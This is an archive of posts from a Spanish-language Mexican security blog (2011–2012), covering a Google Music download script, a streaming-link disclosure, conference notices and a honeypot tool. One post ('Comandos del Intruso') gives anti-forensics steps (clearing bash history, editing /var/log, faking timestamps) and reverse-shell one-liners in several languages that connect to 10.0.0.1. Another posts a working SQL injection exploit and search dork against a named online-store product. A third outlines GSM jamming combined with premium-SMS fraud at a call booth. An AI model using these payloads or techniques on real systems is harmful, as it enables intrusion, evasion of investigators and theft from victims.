(In)Secure México

Segunda temporada de (in)secure México

zeux0r — Fri, 18 May 2012 16:53:06 +0000

Después de un tiempo offline debido a causas ajenas a nosotros, retomamos nuevamente este proyecto de vídeos, noticias, podcast, reporte de vulnerabilidades, esta será nuestra segunda temporada, esperen algunos cambios

Descargar mi Música de Google Music

Komtec1 — Sun, 12 Feb 2012 07:50:11 +0000

Bueno, el primer script ya quedo listo, como les dije en el post anterior, este es para descargar la música propia por lotes o por como ustedes gusten, si no recuerdan, comente en un post pasado que Google Music al subir tu música ya no te deja opción de descargarla a menos que lo hagas mediante Android y te la guarda como 1.mp3, 2.mp3, etc, etc, hay otra opción, que es Music Plus, un complemento que se instala en Chrome, pero este tienes que dar click en la cancion y te agrega una opcion que dice Descargar esta canción o algo asi dice

Bueno, este codigo y metodo es para que selecciones y descargues todas las canciones que quieras y/o busques, les explico a continuacion!

Requisitos:

Teléfono con Android Rooteado

WAMP ó LAMP (Windows/Linux Apache Mysql PHP) (para rapido y facil http://www.appservnetwork.com/ v 2.5.10)

SQLite Browser (http://sourceforge.net/projects/sqlitebrowser/)

Firefox (http://www.mozilla.org/en-US/firefox/new/)

Live HTTP Headers (Addon de Firefox – https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/)

La primera opcion es tener un telefono Android rooteado, con Google Music instalado y nuestra música sincronizada, de ahi ir a la siguiente ruta:

/data/data/com.google.android.music/databases/music.db

Esto es para que podamos tomar la base de datos que maneja Google Music dentro de nuestros telefonos, ahí tenemos los datos para que despues podamos extraer nuestra musica y la guardemos en la pc (por si algun dia quieren recuperarla y no tenerla mas en la nube )

Ok, una vez que tengamos ese archivo lo que tenemos que hacer es abrir un editor de SQLite, (si no tienen uno o no conocen uno, puedes descargarlo de aqui: http://sourceforge.net/projects/sqlitebrowser/ ) ya que lo instalamos, vamos a la parte de Browse Data y seleccionamos la tabla MUSIC, una vez que lo hayamos hecho, damos en file – export, y guardamos el archivo donde queramos en nuestra pc.

Una vez que se haya exportado el archivo .sql lo unico que vamos a necesitar son los datos de la tabla MUSIC, yo importe esa tabla a MySQL, (se me hace mucho mas facil y rapido de manejar)

Este es el primero sql que van a ejecutar:

CREATE TABLE `music` (

`Id` int(11) NOT NULL auto_increment,

`SourceAccount` int(11) NOT NULL,

`SourceId` text NOT NULL,

`SourcePath` text,

`Size` int(11) NOT NULL,

`FileType` int(11) NOT NULL,

`FileDate` int(11) NOT NULL,

`LocalCopyPath` text,

`LocalCopyType` int(11) NOT NULL,

`PlayCount` int(11) NOT NULL default ’0′,

`LastPlayDate` int(11) NOT NULL default ’0′,

`Title` text NOT NULL,

`Album` text,

`Artist` text,

`AlbumArtist` text,

`AlbumArtistOrigin` int(11) default NULL,

`Composer` text,

`Genre` text,

`Year` int(11) default NULL,

`Duration` int(11) default NULL,

`TrackCount` int(11) default NULL,

`TrackNumber` int(11) default NULL,

`DiscCount` int(11) default NULL,

`DiscNumber` int(11) default NULL,

`Compilation` int(11) default NULL,

`BitRate` int(11) default NULL,

`AlbumArtLocation` text,

`SongId` int(11) NOT NULL,

`AlbumId` int(11) NOT NULL default ’0′,

`AlbumArtistId` int(11) NOT NULL default ’0′,

`GenreId` int(11) NOT NULL default ’0′,

`CanonicalName` text NOT NULL,

`CanonicalAlbum` text,

`CanonicalAlbumArtist` text,

`CanonicalGenre` text,

`_sync_dirty` int(11) NOT NULL default ’0′,

`_sync_version` text,

`LocalCopySize` int(11) default ’0′,

`TrackType` int(11) NOT NULL default ’0′,

`LocalCopyBitrate` int(11) NOT NULL default ’0′,

`ArtistOrigin` int(11) NOT NULL default ’0′,

`ArtistId` int(11) NOT NULL default ’0′,

`CanonicalArtist` text,

`Rating` int(11) NOT NULL default ’0′,

`StoreId` text,

`StoreAlbumId` text,

PRIMARY KEY (`Id`)

) ENGINE=MyISAM DEFAULT CHARSET=utf8 ;

Esto nos va a crear la tabla de MUSIC dentro de MySQL, ahora abrimos el archivos SQL que exportaron y seleccionan todo lo de INSERT INTO MUSIC, algo como lo siguiente:

INSERT INTO MUSIC VALUES(1,-xxxxxx,’xxxxxxxx-xxxx-xxxxxx-9f1f-cf424f808f58′,’https://android.clients.google.com/music/mplay?songid=xxxxxxx-0340-37b0-9f1f-cf424f808f58′,xxxxx,x,xxxxxxxxxxx,NULL,0,0,0,’Now”s not the Time’,'Research’,'Seth Kauffman’,'Seth Kauffman’,0,”,’Rock’,0,204000,0,2,1,1,0,0,’http://lh5.ggpht.com/xxxxxxxxxxxxxxpu-PCi3_-TKm1rVGk4rgb3eA7W4mA3o=s200-c’,4xxxxxx061,200xxxxxx,xxxxxx29,6xxxxx8,’now”s not the time’,'research’,'seth kauffman’,'rock’,0,13xxxxxx623080,0,2,0,0,xxxxx7129,’seth kauffman’,0,NULL,NULL);

El total de registros ahí es el total de registros que tienen de canciones, osea, si tienen 10 canciones en google music, van a ser 10 inserts.

Una vez que hayamos ingresado los datos a MySQL, lo que hacemos ahora es configurar el archivo php que les dejo (click aqui para descargarlo), primero lo extraemos en www (c:\appserv\www si es el caso que instalaron appserv), en una carpeta que se llame gmusic (o como le quieran poner, es un archivo php y una carpeta llamada media), una vez que este ahi, lo abrimos y tenemos que cambiar varios parametros, veamos cuales:

en la linea 120 tenemos los datos para conectarse a MySQL, cambiamos ahí por nuestros datos:

$dbname = ‘nombredetudb’;

$dbusername = ‘tuusuario’;

$dbuserpass = ‘tucontrasenia’;

en la linea 253 tenemos el header que se envia para la coneccion a google music, este lo vamos a obtener por medio de Live HTTP Headers, abrimos firefox, entramos a music.google.com y nos logueamos con nuestra cuenta, una vez que estemos ahi, abrimos Live HTTP Headers y le damos click a cualquier cancion para que empiece a reproducir, nos captura los headers que enviamos, entre ellos va nuestra cookie, algo como lo que muestro en la imagen:

Damos en click derecho y copiar, de esta forma ya tenemos nuestros datos de acceso para google, y eso lo vamos a pegar en la linea 253 que dice:

‘header’=>”aquivaloquecopiaste_lacookie”,

borramos aquivaloquecopiaste_lacookie y pegamos lo recien seleccionado.

Si llevamos todos los pasos hasta aquí y no te has perdido, entonces lo siguiente que puedes hacer es abrir tu navegador preferido! (recomiendo chrome por la gestion de memoría que hace) y entrar a http://127.0.0.1/gmusic/descargar.php, una vez que estemos ahi vamos a ver una pantalla como esta:

Ahi lo que vamos a hacer es buscar lo que queramos descargar, escribimos el nombre de la canción, artista o album que queramos y le damos en enter, en caso de que quieran descargar todo su archivo de musica solo den click en enter y les dará una lista de todas las canciones que tienen en su Google Music (recuerden que si son muchas canciones la peticion al dar solamente enter va a tardar algo).

Una vez que lo hacemos, saldrá una pantalla como la siguiente:

Lo que podemos hacer ahí es seleccionar X numero de canciones para que las descargue ó presionar el enlace de Marcar todos para que nos seleccione todo lo que se haya encontrado en la lista y podamos descargarlo, en esta parte podemos organizar nuestra busqueda dando click en la parte de los titulos de las tablas, y asi ordenar por artista, album, cancion, duracion ó peso, si su busqueda es muy grande no lo recomiendo mucho, pues tardara un poco

Una vez que hayamos seleccionado lo que queremos, vamos a dar click en Guardar canciones seleccionadas y esperamos un poco, en ese momento nos empieza a guardar las canciones que hayamos seleccionado en sus respectivas carpetas dentro de c:\appserv\www\gmusic (o el nombre que hayamos puesto), por ejemplo, si tenemos el artista “Uno” el album “Albumsito” y la cancion “Buena Cancion” nos lo guardará de la siguiente forma:

c:\appserv\www\gmusic\Uno\Albumsito\Buena Cancion.mp3

Una vez que el script termina de guardar las canciones seleccionadas nos mostrará un aviso que termino de descargar, en ese momento podemos cerrar nuestro navegador y seguir haciendo lo que queramos (disfrutar de su musica local nuevamente podria ser )

Bueno, ese es el primer post, de como descargar SU música por lotes.

¿Enredado? ¿Largo? Es mas de lo que parece, una vez que lo hagan verán que no es complicado

Estoy trabajando en un script que extraiga los datos directo de music.google.com y de esta forma no necesitemos nuestro Android Rooteado, en caso de que lo termine les aviso por un post tambien.

Pronto tendremos la página de prueba para poder descargar las canciones mediante este servicio, lo que explico aqui pero que no sea de manera local, por mientras pueden ir dejando un listado de grupos favoritos? enviarlo por twitter (@komtec1) o por correo, o dejar comentario aqui en el blog, recuerden que esta parte puede tardar un poco mas, por que quiero tener una base de datos de al menos 100,000 canciones, osea 5 cuentas en su máxima capacidad asi que como repito, me vendría bien el apoyo para sugerencias musicales que esten en la db.

De todas formas sigan pendientes ^^ espero les haya gustado y les sirva este post, dejo las siguientes paralabras clave para que lleguen por medio de buscadores.

Descargar toda mi musica de google music

Cmo descargo mi musica de google music

Forma de descargar mi musica de google music

Y pongo el video de como funciona el script, le agregue jquery y datatables, por si se preguntan con que es lo que hago el sort de la tabla

PD Copie y pegue de Blogspot y traté de arreglar el formato, por eso se ve medio feo jejej :$

Saludos!

Komtec1

Google Music NO ofrece privacidad de Datos, lo cual puede ser util };-D

Komtec1 — Wed, 08 Feb 2012 23:40:29 +0000

Hola!!

Como puse en un post anterior aqui merito mismo en mi blog, estaba revisando unas cosas sobre Google Music, por casualidad, causalidad o como lo quieran llamar encontre lo que a mi parecer son unos fallos de seguridad, yo como niño bueno, los reporte a Google, pero ellos me contestaron que naranjas dulces, que no es fallo de seguridad , por lo que si ellos dicen que no es nada malo, entonces puedo liberarlo y empezar a hacer herramientas para eso, pues es 100% legal y no es un fallo de seguridad (al final pongo lo que me contestaron )

El diagrama del fallo (segun yo) es el que pongo a continuación (no soy un experto en diagramas, digan que hice una imagen, generalmente lo explicaría con texto! xD)

(click para ver en grandote la imágen)

Por pasos:
1.- es lo normal, user y pass para ingresar a gmail
2.- te setean cookies en el navegador para que puedas ingresar a tus servicios de google
3.- en music.google.com buscas la cancion que tu quieras

En este punto (4) esta lo interesante…

4.- se genera el streaming

Primero, en la base de datos de Google MUsic estan varias tablas, las cuales listo a continuación:

[table] ARTWORK AlbumId LocalLocation [table] KEEPON KeepOnId ListId AlbumId ArtistId DateAdded [table] LISTITEMS Id ListId MusicSourceAccount MusicSourceId ClientPosition ServerPosition SourceAccount SourceId [table] LISTITEM_TOMBSTONES Mi tabla aqui esta vacia [table] LISTS Id Name SourceAccount SourceId _sync_version _sync_dirty MediaStoreId ListType ListArtworkLocation [table] LIST_TOMBSTONES Mi tabla aqui esta vacia [table] MUSIC Id SourceAccount SourceId SourcePath Size FileType FileDate LocalCopyPath LocalCopyType PlayCount LastPlayDate Title Album Artist AlbumArtist AlbumArtistOrigin Composer Genre Year Duration TrackCount TrackNumber DiscCount DiscNumber Compilation BitRate AlbumArtLocation SongId AlbumId AlbumArtistId GenreId CanonicalName CanonicalAlbum CanonicalAlbumArtist CanonicalGenre _sync_dirty _sync_version LocalCopySize TrackType LocalCopyBitrate ArtistOrigin ArtistId CanonicalArtist Rating StoreId StoreAlbumId [table] RECENT RecentId ItemDate RecentListId RecentAlbumId [table] RINGTONES Vacia [table] SHOULDKEEPON MusicId KeepOnId [table] _sync_state _id account_name account_type data [table] _sync_state_metadata version [table] android_metadata locale

La por ahorita nos interesa (no digo que las demás no tengan cosas buenas, por ejemplo la de _sync_state nos guarda los datos de logueo encriptados claro) es la de MUSIC

En esta tabla nos guarda la lista de todas las canciones (yo apenas tengo 11,482 ) que tenemos dentro de nuestra cuenta de Google Music, el campos SourceId nos guarda un valor como este:

251c2c68-0340-37b0-9f1f-cf424f808f58
En realidad este es el principal campo que nos importa, los demas son solo para hacer mas “fancy” todo esto (despues verán por que )

Al ver los headers enviados/recibidos con HttpLiveHeaders (no, no me pagan publicidad), podremos ver algo como esto:

https://music.google. com/music/play?u=0&songid=2fafbe9b-db96-3624-97e6-7e52e3e3b463&pt=e => de ahora en adelante UNO GET /music/play?u=0&songid=2fafbe9b-db96-3624-97e6-7e52e3e3b463&pt=e HTTP/1.1

y de ahi obtenemos una respuesta de la siguiente forma:

http://t.doc-0-0-sj.sj.googleusercontent. com/stream/105?id=6a523ee5f96bad0e&itag=25&source=skyjam& o=07065478407166026385&ip=0.0.0.0&ipbits=0&expire=1328258623& sparams=id,itag,source,o,ip,ipbits,expire& signature=7A0C93172AB4B8E0657927ACF5D04E610E64D01C.3BDF980C824B97C35F3CB8238434E39ADFC83AE&key=sj2 => de ahora en adelante DOS

Si se dan cuenta el id principal de UNO no aparece ya en DOS, pero! ya tenemos un link valido para que podamos escuchar nuestra musiquita!

Hasta este momento llega el punto 6 del diagrama (espero hayan seguido mediante el relato el punto 5 y 6 xD)

Hace tiempo vi a DOS, y lo que hice, fue enviarselo a un amigo para que verificara si el podía escuchar la cancion que yo escuchaba en ese momento, como era de esperarse, nos regresa un error 403 (si es que ya entraron a DOS), por lo cual yo en ese momento dije: CLAP CLAP valida de forma genial nuestros datos y tenemos privacidad hasta en nuestra música!

Al analizar la base de datos vi una imagen que se podía abrir desde cualquier sitio, como lo explique en mi post anterior, por lo que segui tratando de escuchar ese link de música desde otro dispositivo.

Al abrirlo con Chrome la musica empezo a escucharse, por lo que probe de nuevo dando f5 y me dio un 403! Raro que pueda escucharlo un momento si y otro no, creo yo.

Haciendo mas pruebas, vi en el link que tiene un timestamp que recibe la variable de expires, el link caduca generalmente cada 30 segundos aproximadamente, osea, en otras palabras es visible para quien sea durante 30 segundos!!!!

”
Google lo que respondio fue esto:

Hey,

Thanks for your email! I’ve talked with the Music team and they’ve
confirmed this is expected behaviour. Since the link is only valid for a
short period of time, there isn’t much potential for abuse.

Also, the URL is unguessable so an attacker can’t obtain a valid link
without some other vulnerability. If you do find a way for an attacker to
generate or obtain a valid link without the victim knowing, then this
would be considered a vulnerability.

Cheers,
XXXXXXX
“

Me parece genial, igual y como lo mencionan ellos, puede que no sea un bug de seguridad, pero creo yo, que si subo un archivo personal a un servicio con contraseña, este tiene que ser visible solo para mi no? si no para que me logueo en mi cuenta de GMusic para escuchar musica, mejor solo hacer un servicio que ponga mi usuario y me de la lista de canciones que tengo disponibles!

Ah bueno, ahi es cuando llegaron mas ideas:

1.- Hacer un script para descargar MI música por lotes en caso de que la necesite

Si! es que google music una vez que la subes te fregaste y no puedes descargarla por lotes, a menos que sea desde android y des click en disponible sin coneccion, y te lo guarda como 1.mp3 2.mp3, etc, etc, no te da el nombre, ni titulo, ni disco, si estan en los metadatos pues ya fregaste y lo puedes visualizar asi en winamp o el reproductor de su eleccion (aunque sea por consola kof kof @hecky jeje ).

Entonces aqui entra en nuestro auxilio las tablas de google nuevamente, dentro de MUSIC vamos a utilizar el campo Title, Album, Artist que son los que contienen la informacion de nuestro archivo musical.

Estoy en el desarrollo de esto, en cuanto quede les explicare paso a paso con naranjas y manzanas (por que hay muchos usuarios no experimentados que quieren hacer esto) para que lo puedan hacer

2.- Este punto creo yo es el peor para google y lo explico a continuación:

Cada cuenta de google music puede almacenar 20 mil canciones, ok, creo 10 cuentas, podre almacenar 200,000 canciones, wow eso suena genial! ahora, que tal si X persona puede descargar una de esas canciones con el ancho de banda de google? en descarga directa? por lotes? en por lotes me refiero a discos completos, canciones seleccionadas, incluso artistas completos (discografias) que esten en algunas de esas 10 cuentas de Google!?

A mi parecer sería genial!!!

No se meteria en problemas legales google? Megaupload, segun todos el culpable fue la compañia, siendo que realmente los culpables (creo yo, de manera muy personal claro) fuimos nosotros, piratebay y demas empresas donde hay alojamiento con Copyright no se han metido en problemas?

Obvio, esto es pensando que el servicio crecería muy rapido, pero, siendo un servicio tan eficaz yo creo que si lo haría, cuando hice musicindexof.com solo ponia links en descarga directa y en un mes alcanzo un PR de 4 (si, en un mes de cuando se registro, abrio y transcurrieron 30 dias), y en ese entonces NO existia (o yo no usaba al menos) twitter, asi que la difusion sería mas rapida creo yo.

La idea es esta:

Hacer un script, primero, tendra la base de datos de las 5 cuentas, esto con cualquier gestor de DB es lo de menos, tendra los datos importantes arriba mencionados, “osease” el ID y nombre, artista, album y cuenta de google (esto esta en el campo SourceAccount de la tabla MUSIC) con eso al principio es mas que suficiente, nuestro script se loguea a nuestra cuenta 1 de google, guarda las cookies y repite el mismo paso con la cuenta 2,3,4,etc, de ahi ya estamos autentificados, ahora el usuario hace una busqueda de la cancion juanito con el artista perez, si esta en la base de datos regresa un link valido por 30 segundos para descargar, escuchar online, etc, etc.

Creo que este es el post mas largo que he escrito, hay muchas mas ideas, pero por mientras termino el post aqui, por que creo que ya se cansaron de leer (si es que llegaron hasta aqui claro).

PD. Esperen el script para descargar por lotes de Google Music, lo tendre por estos dias
PD. Gracias por leer la nota completa si es que lo hiciste!
PD. Te gusto? retuitealo!
PD. Creo que ya no hay más
PD. Si se siguen preguntando como consegui los campos de Google Music, en su android rooteado vayan aqui: /data/data/com.google.android.music/databases/music.db copienla y usen un gestor de sqlite, si no saben como, esperen y vean los siguientes posts

Saludos malignos }:)) … ah caray, no, no, ese es otro blog!

jajajajajajaajajajajajajaja

Saludos!

Komtec1

FreesSecurity México

Rafael Bucio — Thu, 02 Feb 2012 00:22:41 +0000

Nos vemos en el FreeSecurity

http://www.freesecurity.mx/

¿Qué es FreeSecurity?
FreeSecurity es un congreso de seguridad en Cómputo e Informática y es organizado por integrantes del Grupo de Usuarios de Software Libre del Tecnológico de Tuxtepec en coordinación con el área de Sistemas y Computación del Instituto Tecnológico de Tuxtepec. Tiene como principio acercar a destacadas personalidades del software libre expertos en seguridad y a la comunidad formada en su gran parte por estudiantes de nivel superior y licenciatura, así como profesionistas y cualquier interesado y simpatizante de la seguridad informatica. Tiene como objetivo principal aprender unos de otros y de convivir, fortaleciendo los conocimientos de todos los asistentes.

¿Por qué el nombre de FreeSecurity?.
El nombre FreeSecurity hace alución a que la seguridad esta al alcance de todos utilizando las herramientas que el mundo del software libre nos ofrece.

¿Qué habrá en FreeSecurity?.
Un ciclo de conferencias y talleres impartidos por grandes expertos en seguridad como lo son hacker’s, administradores de sistemas y desarrolladores de software, todo tratando puramente de seguridad en Cómputo e Informática valiendose de herramientas de Software Libre.

¿Hacia quién está dirigido FreeSecurity?.
Está dirigido especialmente a todos los interesados en aprender, utilizar y desarrollar herramientas de software libre para la seguridad, como lo pueden ser estudiantes de nivel medio, superior y de posgrado, así como profesionistas, consultores y empresarios.

¿Qué más puedo esperar de FreeSecurity?
Los asistentes, ponentes, expositores y patrocinadores, contarán con conocimientos especializados y actualizados en materia de seguridad en Cómputo e Informática adquiridos durante el FreeSecurity, además de varios obsequios de patrocinadores, reconocimiento de participación y un sin fín de contactos importantes y la retribución de la información obtenida.

Protegiéndonos en la red

Carlos Hinojo — Sun, 29 Jan 2012 06:10:53 +0000

En ocasiones, queremos mantener un mayor control de la seguridad en ciertas redes hostiles en nuestra computadora o servidor, les traigo en esta ocasión un programa que he estado probando últimamente que se llama “Artillery”, esta hecho en python.

Es un programa de los creadores de Social Engineering Toolkit, y en si el programa lo que hace es

Nos levanta varios puertos falsos, enmascarados como “ssh”, “mysql”, “http”, “ftp”, (y muchos otros que yo ni sabia que existían)
En caso de que alguno de esos puertos sea tocado por alguna persona no autorizada, banea cualquier conexion con dicha persona, y la manda a un blacklist.
Monitorea nuestros directorios expuestos y los ataques brute force por ssh.
Aparte de detectar ataques, nos manda un correo a gmail, o algun otro con un informe del ataque detectado.

Si quieren checarlo pueden hacerlo en la pagina del sec maniac, este proyecto fue liberado el año pasado, el unico inconveniente que tuve fue que me obstruye de levantar algun servicio en algun puerto ya ocupado por el programa, en esos casos solo modifican el archivo de config dentro de /var para decirle sobre cuales puertos levantar servicios falsos.

Para bajarnos el proyecto podemos entrar a la pagina

Artillery

al ejecutar el install.py, nos copia los directorios y archivos dentro de /var, y te modifica el rc.conf para iniciar el proceso al empezar, sin embargo yo lo quite de ahi, y solo lo inicio con “/etc/init.d/artillery start” cuando me pongo paranoico

Espero que les sirva un poco, no viene nada mal un poco de protección en algunas ocasiones, por mi parte me retiro, Que tengan un lindo dia.

Comandos del Intruso

Carlos Hinojo — Sat, 21 Jan 2012 05:09:40 +0000

En algunas ocasiones, cuando se hacen pruebas de seguridad, es indispensable asegurarse de evitar dejar cualquier rastro de intrusión, aqui hay algunos comandos o truquitos que son muy interesantes a la hora de ocultar nuestros rastros, algunos de estos comandos los aprendi de Storm de la comunidad de Go Null Yourself, una comunidad muy interesante.

Ahora a lo que venimos…

.bash_history

Algunas cosas simples, cuando un usuario accesa a un server y comienza a moverse en el, los logs comienzan a guardar sus movimientos, uno de ellos es que se comienzan a guardar los comandos dentro de el “.bash_history”.

Podemos detener que esto suceda con el siguiente comando…

$ unset HISTFILE
o ya sea, exportandolo…

$ export HISTFILE=/dev/null
con esto detenemos que se guarden aunque, tambien podemos simplemente, borrar y crearlo de nuevo con

$ rm .bash_history && touch .bash_history
con esto estamos borrando .bash_history y a su vez estamos creando uno nuevo con la fecha de hoy, o simplemente quitar aquellos comandos que utilizamos nosotros dentro del sistema. También podemos cambiarle la fecha a un fichero modificandola primero a nuestro sistema con

$date -s "2012-01-12 19:13:29"
y despues procedemos a modificarle la fecha al archivo con el siguiente comando.

$touch ble.txt
podemos despues ver los stats de dicho archivo y saldria algo parecido a esto

$stat archivo.txt

File: «ble.txt» Size: 0 Blocks: 0 IO Block: 4096 fichero regular vacío Device: 806h/2054d Inode: 3421006 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 1000/juancarlos) Gid: ( 1000/juancarlos) Access: 2012-01-12 19:13:29.929059168 +0000 Modify: 2012-01-12 19:13:29.017059168 +0000 Change: 2012-01-12 19:13:29.017059168 +0000

después debemos modificar la fecha de sistema, pues podria eso ser motivo de ser atrapados, algo también que podemos hacer si queremos vaciar un fichero sin tener que borrarlo es, crear un script vacio, por ejemplo, llamarlo, “insecure”.

$touch insecure
y despues lo vaciamos en el archivo con…

$cat insecure > archivo.txt

$ cat /dev/null > archivo.txt
para vaciar dicho fichero.

Logs de Sistema

dentro del sistema se guardan logs de todo lo que ocurre dentro de el, y que podrian advertirle al administrador de nuestra intrusión, algunos de estos se almacenan dentro de /var/log, dentro de eso podemos quitar cualquier entrada que tenga que ver con nuestra intrusión en estos directorios.

/var/log/messages* /var/log/secure* /var/log/audit* /var/log/auth*
Borrarlos causaría mucha sospecha, recomiendo solo quitar manualmente lo que no se necesite saber

SSH

En el momento en que decidimos entrar, ya sea por una conexion ssh, hay ciertos parametros que podemos usar para entrar de forma mas silenciosa.

el parametro -T nos daria que al conectarnos, no nos asigne un tty, dando asi que no estemos enlistados con el comando “w”.

ssh -T user@host.com
al no tener tty, pues… no tendriamos con que movernos cierto?

podemos agregar el comando “bash -i”

ssh -T user@host.com bash -i
o, finalmente, podemos evitar ser escritos en el archivo de known_hosts con lo siguiente.

ssh -T -o UserKnownHostsFile=/dev/null user@host.com bash -i

Reverse Shell

Quizá quieran generar una conexión hacia nosotros una vez que han tenido acceso para mantenerse dentro, bueno…

aquí hay unos scripts de pentestmonkey para generarnos una shell hacia nosotros, queda en ustedes elegir el lenguaje y ejecutarlos, o correrlos desde terminal como comando.

Bash
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR,">&S");exec("/bin/sh -i");};'

Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# Assuming that the TCP connection uses file descriptor 3

Ruby
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
para mostrarnos la shell en xterm, el siguiente comando debe correrse en el objetivo.

$ xterm -display 10.0.0.1:1
mientras que esto lo corremos en el host que recibira.

$ Xnest :1 $ xhost +ipdelobjetivo.

o Por si quieren generar un netcat.

$ nc -e /bin/sh 10.0.0.1 1234
si no puedes usar el -e, usa este.

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Espero que les sirva, agradecimientos a Storm de GNY, y pentestmonkey, Cualquier comando que también consideren que podrían servir, compartanlos

Insecure Mexico en el X.25

zeux0r — Fri, 20 Jan 2012 17:36:49 +0000

El dia de hoy se confirma una ponencia que dara Arturo Zamora

miembro del staff de insecure mexico, sobre Robo de Identidad Mediante CrimeWare, les dejo un poco de los temas que se tocaran.

Analizaremos:

Como operan?
Ataque silencioso
Alerta!! Sistema Infectado
Recolectando Información
Tu identidad Fue robada
Protección?

Aquí un poco de información sobre el congreso de seguridad.

El “X.25 Ethical Hacking Conferences” desde el año 2010 que fue su primera edición permite reunir en un solo espacio a investigadores reconocidos a nivel nacional y mundial quienes comparten las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

mas informacion visiten

http://www.x25.org.mx

SQL Injection MyStore Tienda Virtual

zeux0r — Tue, 03 Jan 2012 15:35:04 +0000

El dia de ayer decidi hacer publica una vulnerabilidad en un sistema de ventas online, solo puse uno de los varios links , ya que el sistema sufre de varios sql, como xss, lo peor de esta vulnerabilidad es que revela absolutamente todos los datos de los compradores.

Informacion no segura

para explotar es lo siguiente:

========================================================================================
| # Title : SQL Injection MyStore Tienda Virtual |
| # Author : Arturo Zamora |
| # email : Arturo_zamora_c@hotmail.com |
| # DAte : 02/01/2012 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |
| # Dork : inurl:art_detalle.php?id= |
====================== zeux0r 2012 =================================
Exploit :
======================

http://localhost/path/art_detalle.php?id={sqli}

======================
Example:
======================

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

======================
dbs:
======================
articulos
articulos_nivel3
articulos_relacionados
articulos_secciones
atajada
atajadausa
ayuda
ayudausa
banners
banners_conteo
banners_lateral
banners_lateralusa
basket
campania
clientesclientes_envio
clientes_facturacion
colores
comentario
comisionistas
comisionistas_hits
comisionistas_modulos
contacto
descuentos
descuentos_cruzados
descuentos_temp
especificacion
home
homeusa
justin
justinusa
mensajeria
mensajeriausa
mixer
newsletter
newsletter_mensaje
nivel1
nivel2
nivel3
parametros
paypal
pedidos
pedidos_detalle
pedidos_detalleusa
pedidosusa
remate
remateusa
secciones
shopper
sol_info
talisman
tallas
ticker
tickerusa
visitas

======================
Information :
======================

password decrypt md5

======================

I Love U Pumosita

www.insecure.org.mx

================================ Mexican shotos ========================================
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *
-------------------------------------------------------------------------------------------

mirror:http://www.exploit-db.com/exploits/18302/

Inhibidores de Señal 2da parte [El escenario perfecto] [GSM-Bluetooth]

MaztoR — Tue, 20 Dec 2011 01:58:16 +0000

Como era de esperarse… aqui les tengo la segunda parte de “inhibidores de Señal” que les habia prometido en el articulo anterior.

Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano.

Primero que nada un poco de terminologias…
———————————————————————————–
GSM
Segun wikipedia..

El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre de regalías, de telefonía móvil digital.

Un cliente GSM puede conectarse a través de su teléfono con su computador y enviar y recibir mensajes por correo electrónico, faxes, navegar por Internet, acceder con seguridad a la red informática de una compañía (red local/Intranet), así como utilizar otras funciones digitales de transmisión de datos, incluyendo el servicio de mensajes cortos (SMS) o mensajes de texto.

GSM se considera, por su velocidad de transmisión y otras características, un estándar de segunda generación (2G). Su extensión a 3G se denomina UMTS y difiere en su mayor velocidad de transmisión, el uso de una arquitectura de red ligeramente distinta y sobre todo en el empleo de diferentes protocolos de radio (W-CDMA).

Seguir leyendo el texto de wikipedia
———————————————————————————–

Bueno iniciemos la objetividad de este articulo…

Ya hemos leido anteriormente sobre 1-Inhibidores 2-señales 3-GSM; con estos terminos bien claros supongo que podras tomarte mas idea… de lo que realmente hablo y planteo en esta serie de articulos.

Ahora debemos plantear un NUEVO! “ESCENARIO PERFECTO” desde la perspectiva de un “Atacante Malicioso”, Este nuevo Escenario será.. “EL PUESTO DE LLAMADAS” del cual nos aprovecharemos de su multitud de gente alterada y con poco tiempo disponible.

Nuestro Escenario:

Puesto de llamada de nivel: Intermedio
Encargados del puesto de llamadas: 1
Cantidad de personas hablando por cel: 12
Cantidad de personas en espera: 6

———————————————————————————-

Ahora procedamos a realizar nuestro ataque, que en este caso el beneficio sera…?
DINERO $$$, la idea de esto es lograr que el encargado o uno de sus clientes nos transfiera una suma grande de dinero mediante un simple SMS, el cual estara todo “PLANEADO” por asi decir..

Nota clave: de logica sabemos que los puntos de llamada “LA MAYORIA” son de planes “POSTPAGO”, es importante saberlo porque te permite dar nocion a cual gran suma poner en tu servicio de cobro.

Primero que nada deberiamos tener un haz bajo la manga y este seria un Servicio SMS que configurariamos para que sea de cobro, eso si un cobro de gran SUMA! el cual si un telefono postpago envia un SMS al numero de nuestro servicio le cobraria la alta suma que habiamos puesto antes… que lindo no?

Iniciemos…

Con nuestro servicio SMS pedido y configurado solo procedemos a usarlo? pero de una forma arbirtraria y sin aviso alguno…

Vamos a montar nuestro INHIBIDOR de SEÑAL GSM cerca del puesto de llamadas objetivo, el cual la comunicacion se cortara en esa zona…

